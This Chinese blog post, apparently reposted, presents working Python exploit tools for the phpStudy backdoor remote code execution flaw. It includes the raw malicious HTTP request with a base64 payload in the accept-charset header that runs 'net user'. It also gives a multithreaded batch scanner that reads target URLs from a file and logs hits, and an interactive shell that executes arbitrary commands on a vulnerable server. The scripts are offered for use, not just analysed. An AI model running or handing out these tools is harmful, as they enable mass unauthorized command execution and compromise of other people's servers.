phpstudy后门rce批量利用脚本的实现


Posted in PHP onDecember 12, 2019

写两个一个批量检测的 一个交互式shell的

暂时py 图形化的qt写出来..有点问题

后门包 :

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1

phpstudy后门rce批量利用脚本的实现

phpstudy后门rce批量利用脚本的实现

执行那段写shell即可

phpstudy后门rce批量利用脚本的实现

晚上抽点空简单写个发包的py:

phpstudy后门rce批量利用脚本的实现

#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/

import base64
import requests
import threading
import queue


print("======Phpstudy Backdoor Exploit============\n")
print("===========By Qing=================\n")
print("=====Blog:https://www.cnblogs.com/-qing-/==\n")
payload = "echo \"qing\";"
payload = base64.b64encode(payload.encode('utf-8'))
payload = str(payload, 'utf-8')
headers = {
  'Upgrade-Insecure-Requests': '1',
  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
  'Accept-Language': 'zh-CN,zh;q=0.9',
  'accept-charset': payload,
  'Accept-Encoding': 'gzip,deflate',
  'Connection': 'close',
}



def write_shell(url,headers):
  try:
    r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)
    if "qing" in r.text:
      print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')
      with open('success.txt','a') as f:
          f.write(url+'\n')
    else:
      print ('[ - ] BackDoor failed: '+url+'[ - ]\n')
  except:
    print ('[ - ] Timeout: '+url+' [ - ]\n')

url = "http://xxx"
write_shell(url=url,headers=headers)

界面优化、改下多线程、批量读取文本文件后的代码:

#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/

import base64
import requests
import threading
import threadpool


print("======Phpstudy Backdoor Exploit============\n")
print("===========By Qing=================\n")
print("=====Blog:https://www.cnblogs.com/-qing-/==\n")




def write_shell(url):
  payload = "echo \"qing\";"
  payload = base64.b64encode(payload.encode('utf-8'))
  payload = str(payload, 'utf-8')
  headers = {
  'Upgrade-Insecure-Requests': '1',
  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
  'Accept-Language': 'zh-CN,zh;q=0.9',
  'accept-charset': payload,
  'Accept-Encoding': 'gzip,deflate',
  'Connection': 'close',
}
  try:
    r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)
    if "qing" in r.text:
      print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')
      with open('success.txt','a') as f:
          f.write(url+'\n')
    else:
      print ('[ - ] BackDoor failed: '+url+'[ - ]\n')
  except:
    print ('[ - ] Timeout: '+url+' [ - ]\n')

# url = "http://xxx"
# write_shell(url=url,headers=headers)

def main():
  with open('url.txt','r') as f:
    lines = f.read().splitlines()
    task_pool=threadpool.ThreadPool(5)
    requests=threadpool.makeRequests(write_shell,lines)
  for req in requests:
    task_pool.putRequest(req)
    task_pool.wait() 
if __name__ == '__main__':
  main()


#线程队列部分
# th=[]
# th_num=10
# for x in range(th_num):
#     t=threading.Thread(target=write_shell)
#     th.append(t)
# for x in range(th_num):
#     th[x].start()
# for x in range(th_num):
#     th[x].join()

phpstudy后门rce批量利用脚本的实现

你也可以加上读取php文件的字典 这个简单没啥说的

下一个是交互式shell

#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/

import base64
import requests
import threading
import threadpool
import re

print("======Phpstudy Backdoor Exploit---os-shell============\n")
print("===========By Qing=================\n")
print("=====Blog:https://www.cnblogs.com/-qing-/==\n")



def os_shell(url,headers,payload):
  try:
    r = requests.get(url=url+'/phpinfo.php',headers=headers,verify=False,timeout=10)
    # print(r.text)
    res = re.findall("qing(.*?)qing",r.text,re.S)
    print("[ + ]===========The Response:==========[ + ]\n")
    res = "".join(res)
    print(res)
  except:
    print("[ - ]===========Failed! Timeout...==========[ - ]\n")

def main():
  url = input("input the Url , example:\"http://127.0.0.1/\"\n")
  payload = input("input the payload , default:echo system(\"whoami\");\n")
  de_payload = "echo \"qing\";system(\"whoami\");echo \"qing\";"
  if payload.strip() == '':
    payload = de_payload
  payload = "echo \"qing\";"+payload+"echo \"qing\";"
  payload = base64.b64encode(payload.encode('utf-8'))
  payload = str(payload, 'utf-8')
  headers = {
  'Upgrade-Insecure-Requests': '1',
  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
  'Accept-Language': 'zh-CN,zh;q=0.9',
  'accept-charset': payload,
  'Accept-Encoding': 'gzip,deflate',
  'Connection': 'close',
  }
  os_shell(url=url,headers=headers,payload=payload)
if __name__ == '__main__':
  main()

phpstudy后门rce批量利用脚本的实现

 以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持三水点靠木。

PHP 相关文章推荐
substr()函数中文版
Oct 09 PHP
PHP XML数据解析代码
May 26 PHP
PHP中防止SQL注入实现代码
Feb 19 PHP
一个PHP并发访问实例代码
Sep 06 PHP
PHP表单递交控件名称含有点号(.)会被转化为下划线(_)的处理方法
Jan 06 PHP
基于MySQL到MongoDB简易对照表的详解
Jun 03 PHP
coreseek 搜索英文的问题详解
Jun 08 PHP
php中怎么搜索相关联数组键值及获取之
Oct 17 PHP
8个PHP数组面试题
Jun 23 PHP
PHP的Yii框架中YiiBase入口类的扩展写法示例
Mar 17 PHP
Json_decode 解析json字符串为NULL的解决方法(必看)
Feb 17 PHP
laravel接管Dingo-api和默认的错误处理方式
Oct 25 PHP
PHP设计模式之数据访问对象模式(DAO)原理与用法实例分析
Dec 12 #PHP
PHP设计模式之建造者模式(Builder)原理与用法案例详解
Dec 12 #PHP
PHP设计模式之适配器模式(Adapter)原理与用法详解
Dec 12 #PHP
PHP学习记录之常用的魔术常量详解
Dec 12 #PHP
记Laravel调用Gin接口调用formData上传文件的实现方法
Dec 12 #PHP
PHP命名空间(namespace)原理与用法详解
Dec 11 #PHP
在 Laravel 6 中缓存数据库查询结果的方法
Dec 11 #PHP
You might like
PHP语法速查表
2006/12/06 PHP
PHP编程中字符串处理的5个技巧小结
2007/11/13 PHP
PHP 命名空间实例说明
2011/01/27 PHP
flash javascript之间的通讯方法小结
2008/12/20 Javascript
Javascript 网页水印(非图片水印)实现代码
2010/03/01 Javascript
cnblogs TagCloud基于jquery的实现代码
2010/06/11 Javascript
nodejs的require模块(文件模块/核心模块)及路径介绍
2013/01/14 NodeJs
JQuery加载图片自适应固定大小的DIV
2013/09/12 Javascript
js select option对象小结
2013/12/20 Javascript
Javascript 函数parseInt()转换时出现bug问题
2014/05/20 Javascript
@ResponseBody 和 @RequestBody 注解的区别
2017/03/08 Javascript
推荐VSCode 上特别好用的 Vue 插件之vetur
2017/09/14 Javascript
浅谈手写node可读流之流动模式
2018/06/01 Javascript
从零开始学习搭建React脚手架项目
2018/08/23 Javascript
Nodejs让异步变成同步的方法
2019/03/02 NodeJs
基于JS实现简单滑块拼图游戏
2019/10/12 Javascript
Openlayers实现点闪烁扩散效果
2020/09/24 Javascript
vue keep-alive的简单总结
2021/01/25 Vue.js
[17:45]DOTA2 HEROES教学视频教你分分钟做大人-军团指挥官
2014/06/11 DOTA
介绍Python中的文档测试模块
2015/04/28 Python
Python3.6基于正则实现的计算器示例【无优化简单注释版】
2018/06/14 Python
Python常见排序操作示例【字典、列表、指定元素等】
2018/08/15 Python
解决Python计算矩阵乘向量,矩阵乘实数的一些小错误
2019/08/26 Python
python同步windows和linux文件
2019/08/29 Python
Python实现像awk一样分割字符串
2020/09/15 Python
使用纯 CSS 创作一个脉动 loader效果的源码
2018/09/28 HTML / CSS
绘画设计学生的个人自我评价
2013/09/20 职场文书
英语感恩演讲稿
2014/01/14 职场文书
三年级数学教学反思
2014/01/31 职场文书
志愿者活动总结报告
2014/06/27 职场文书
课堂打架检讨书200字
2014/11/21 职场文书
感谢信的格式
2015/01/21 职场文书
法院答辩状格式
2015/05/22 职场文书
心灵点滴观后感
2015/06/02 职场文书
CSS3 实现NES游戏机的示例代码
2021/04/21 HTML / CSS
JavaScript实现登录窗体
2021/06/22 Javascript